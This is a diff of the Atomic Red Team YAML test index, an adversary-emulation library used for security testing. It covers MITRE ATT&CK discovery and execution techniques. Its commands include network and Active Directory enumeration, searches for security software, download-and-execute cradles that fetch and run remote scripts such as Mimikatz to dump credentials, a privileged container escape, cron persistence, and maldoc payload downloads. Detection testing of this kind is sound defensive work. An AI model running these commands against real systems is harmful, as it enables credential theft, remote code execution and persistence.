-' + ' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -52837,7 +52837,7 @@ discovery: executor: command: 'tasklist -' + ' name: command_prompt T1012: technique: @@ -53005,7 +53005,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain -' + ' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -53023,7 +53023,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} -' + ' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
@@ -53036,7 +53036,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i -' + ' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -53047,7 +53047,7 @@ discovery: executor: command: 'arp -a -' + ' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -53062,18 +53062,18 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install arp on the machine."; exit 1; -' + ' executor: command: 'arp -a | grep -v ''^?'' -' + ' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -53101,7 +53101,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done -' + ' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -53146,35 +53146,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'adidnsdump must be installed and part of PATH -' + ' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} -' + ' get_prereq_command: 'pip3 install adidnsdump -' + ' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} -' + ' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects 
@@ -53193,14 +53193,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -53220,14 +53220,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -53331,7 +53331,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' -' + ' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -53343,7 +53343,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' -' + ' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -53356,7 +53356,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 -' + ' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -53433,7 +53433,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion -' + ' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b 
@@ -53453,7 +53453,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors -' + ' supported_platforms: - macos executor: @@ -53562,7 +53562,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -53572,7 +53572,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -53589,7 +53589,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -53599,7 +53599,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' T1082: technique: object_marking_refs: @@ -53667,7 +53667,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. -' + ' supported_platforms: - windows executor: @@ -53679,7 +53679,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info -' + ' supported_platforms: - macos executor: @@ -53691,7 +53691,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info -' + ' supported_platforms: - linux - macos 
@@ -53708,14 +53708,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null -' + ' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -53734,7 +53734,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -53750,40 +53750,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. -' + ' supported_platforms: - windows executor: command: 'hostname -' + ' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. -' + ' supported_platforms: - linux - macos executor: command: 'hostname -' + ' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. -' + ' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid -' + ' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 
@@ -53810,27 +53810,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - windows executor: command: 'set -' + ' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - macos - linux executor: command: 'env -' + ' name: sh T1614: technique: @@ -53977,7 +53977,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all -' + ' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -54037,10 +54037,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist -' + ' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -54059,7 +54059,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" -' + ' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -54077,14 +54077,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt 
@@ -54213,7 +54213,7 @@ discovery: executor: command: 'Get-NetTCPConnection -' + ' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -54228,14 +54228,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; -' + ' executor: command: | netstat @@ -54269,10 +54269,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) -' + ' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -54451,10 +54451,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' name: command_prompt T1124: technique: @@ -54521,7 +54521,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -54539,13 +54539,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. -' + ' supported_platforms: - windows executor: command: 'Get-Date -' + ' name: powershell T1497.003: technique: @@ -58138,7 +58138,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" -' + ' name: sh T1053.001: technique: 
@@ -58195,7 +58195,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -58211,30 +58211,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -58331,7 +58331,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -58628,7 +58628,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. -' + ' supported_platforms: - containers input_arguments: @@ -58643,20 +58643,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} -' + ' name: bash elevation_required: false T1053.007: @@ -58725,7 +58725,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: 
@@ -58736,17 +58736,17 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -58758,7 +58758,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -58769,20 +58769,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1053.003: @@ -58841,7 +58841,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -58861,7 +58861,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -58869,7 +58869,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -58901,7 +58901,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -58918,10 +58918,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1610: technique: external_references: @@ -59008,24 +59008,24 @@ execution: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -59033,14 +59033,14 @@ execution: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -59050,11 +59050,11 @@ execution: -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1559.002: technique: created: '2020-02-12T14:10:50.699Z' 
@@ -59131,7 +59131,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word -' + ' supported_platforms: - windows executor: @@ -59154,13 +59154,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script -' + ' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx -' + ' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -59474,7 +59474,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl -' + ' supported_platforms: - macos input_arguments: @@ -59489,10 +59489,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} -' + ' cleanup_command: 'launchctl remove #{label_name} -' + ' name: bash T1053.004: technique: @@ -59633,7 +59633,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -59644,7 +59644,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59655,7 +59655,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59664,13 +59664,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file -' + ' supported_platforms: - windows input_arguments: 
@@ -59688,7 +59688,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -59706,7 +59706,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59717,7 +59717,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59745,7 +59745,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59756,7 +59756,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59783,7 +59783,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59794,7 +59794,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59826,7 +59826,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed -' + ' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null 
@@ -59836,7 +59836,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -' + ' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -59908,7 +59908,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -59917,10 +59917,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' - description: 'Google Chrome must be installed -' + ' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -59929,7 +59929,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59947,7 +59947,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). -' + ' supported_platforms: - windows input_arguments: @@ -59967,7 +59967,7 @@ execution: & "#{pua_file}" cleanup_command: 'Remove-Item #{pua_file} -' + ' - name: Office Generic Payload Download auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c description: | @@ -59982,14 +59982,14 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro -' + ' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. -' + ' type: url default: "$false" c2_parent_directory: 
@@ -60008,7 +60008,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel -' + ' type: String default: Word dependency_executor_name: powershell @@ -60016,17 +60016,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. -' + ' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) -' + ' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" -' + ' - description: 'Microsoftt #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -60037,7 +60037,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: name: powershell command: | @@ -60050,7 +60050,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore -' + ' T1204.003: technique: external_references: @@ -60392,7 +60392,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -60404,7 +60404,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" -' + ' name: command_prompt elevation_required: true - name: Run BloodHound from local disk 
@@ -60424,15 +60424,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" -' + ' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -60441,7 +60441,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -60459,7 +60459,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -60467,7 +60467,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -' + ' supported_platforms: - windows executor: @@ -60482,7 +60482,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. -' + ' supported_platforms: - windows executor: @@ -60513,7 +60513,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" -' + ' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da 
@@ -60533,7 +60533,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" -' + ' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -60553,7 +60553,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" -' + ' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -60571,7 +60571,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" -' + ' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -60613,26 +60613,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed -' + ' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually -' + ' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion -' + ' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -60643,14 +60643,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive -' + ' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically -' + ' executor: name: powershell command: | 
@@ -60659,7 +60659,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore -' + ' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -60676,12 +60676,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled -' + ' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting -' + ' executor: name: powershell elevation_required: true @@ -60715,7 +60715,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -60751,7 +60751,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -60782,7 +60782,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -60818,7 +60818,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments 
@@ -60831,7 +60831,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -60842,7 +60842,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} -' + ' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -60864,7 +60864,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" -' + ' executor: name: powershell elevation_required: true @@ -60950,13 +60950,13 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests -' + ' executor: command: '$which_python -c ''import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'' -' + ' name: sh cleanup_command: "rm #{payload_file_name} \n" - name: Execute Python via scripts (Linux) @@ -60992,7 +60992,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=`which python`; python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -61018,7 +61018,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments -' + ' supported_platforms: - linux input_arguments: @@ -61052,7 +61052,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=`which python`; python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -61074,7 +61074,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' 
